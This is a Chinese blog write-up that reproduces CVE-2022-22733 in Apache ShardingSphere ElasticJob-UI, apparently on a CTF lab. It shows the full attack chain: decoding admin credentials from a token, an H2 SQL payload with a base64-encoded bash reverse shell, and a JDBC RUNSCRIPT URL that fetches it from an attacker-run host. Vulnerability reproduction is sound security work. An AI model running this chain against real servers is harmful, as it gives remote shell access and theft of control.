【CVE-2022-22733漏洞复现】

Apache ShardingSphere ElasticJob-UI漏洞 漏洞编号:CVE-2022-22733

文档说明

本文作者:SwBack
创作时间:2024/1/21 19:19:19
知乎:https://www.zhihu.com/people/back-88-87
CSDN:https://blog.csdn.net/qq_30817059
百度搜索: SwBack

漏洞描述

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

影响版本

Apache ShardingSphere ElasticJob-UI v3.0.0 及之前的版本

漏洞原理

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

具体漏洞原理可以参考这篇文章

https://www.shangyexinzhi.com/article/4555060.html

漏洞复现

抓取token

通过burp进行登录请求抓包

采用游客账号guest guest

在这里插入图片描述

在这里插入图片描述

base64解密token

利用burp自带的解密直接base64解密token,获得账号密码均为root

在这里插入图片描述

构造恶意代码

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "Q";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}')

其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==为反弹shell base64加密代码。

解码之后为bash -i >& /dev/tcp/111.111.111.111/11111 0>&1

格式为:bash -i >& /dev/tcp/IP/PORT 0>&1

上传攻击服务器

将恶意代码保存为poc.sql,并在本地开启一个web服务,将恶意文件放到web目录下

在这里插入图片描述

访问测试:

在这里插入图片描述

攻击服务器开启监听

在这里插入图片描述

上传恶意文件

使用之前解密得到的root账号密码登录进系统。

访问Event trace data source -> +ADD

其中Name Username Password 随意

Driver 选择 org.h2.Driver

url 构造如下

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ip:port/poc.sql

这里的IP:PORT 为poc.sql 所在的web地址

例如我这里为

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ae59ad7a-70b7-4ff7-9721-45e96b5b1f21.node5.buuoj.cn:81/poc.sql'

如图所示

在这里插入图片描述

点击Test connect 连接成功

在这里插入图片描述

可以看到存在漏洞的服务器已经访问了我们放置POC 的地址。

在这里插入图片描述

成功反弹shell

在这里插入图片描述

在根目录发现flag.

在这里插入图片描述

复现总结

这个漏洞复现并不难,其中遇到的几个问题,.

一个是因为服务器防火墙问题导致一直无法访问.关闭防火墙即可。

还有一个是poc的代码复制时将CREATE 复制为了REATE 导致无法反弹shell。

需要细心检查一下

原创申明

本文由SwBack 原创文章, 如有问题,欢迎指正。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值